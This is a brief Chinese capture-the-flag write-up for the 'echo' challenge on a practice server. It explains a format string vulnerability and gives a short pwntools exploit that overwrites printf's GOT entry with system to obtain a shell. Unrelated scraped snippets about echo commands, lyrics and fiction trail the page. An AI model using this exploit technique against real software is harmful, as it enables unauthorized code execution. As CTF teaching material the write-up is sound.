教科书般的格式化字符串漏洞,先找到偏移为7
然后将prinf_got地址改成system地址即可
exp:
from pwn import *
#p = process('./echo')
p = remote('hackme.inndy.tw',7711)
elf = ELF('./echo')
offset = 7
printf_got = elf.got['printf']
system_addr = elf.plt['system']
payload = fmtstr_payload(offset,{printf_got:system_addr})
p.sendline(payload)
p.interactive()
Echo 少女时代 (Echo Echo Echo Echo Echo~ Echo~ 喏 噶腾 男加 亲家 桥厄米...
预定义变量 echo $PWD echo $USER echo $HOME echo ~ echo $PATH e...
echo echo -n 不加换行符echo -e 解释转义符 (echo -e "hello \t world"...
@echo off echo *** %DATE% echo *** %TIME% set THISDATE=%D...
@echo off echo ------------------------------------------...
以echo为例 echo “$tireqty tires”; 与 echo ‘$tireqty tires';...
echo命令 echo嵌入变量 echo "Hello $LOGNAME, Have a nice day !" ...
荷西:Echo,你等我六年,我有四年大学要念,还有两年兵役要服,六年一过,我就娶你。 荷西:我的愿望是拥有一栋小小...
#!/bin/sh echo "********************************" echo " ...
本文标题:echo
本文链接:https://www.haomeiwen.com/subject/ziktiftx.html
网友评论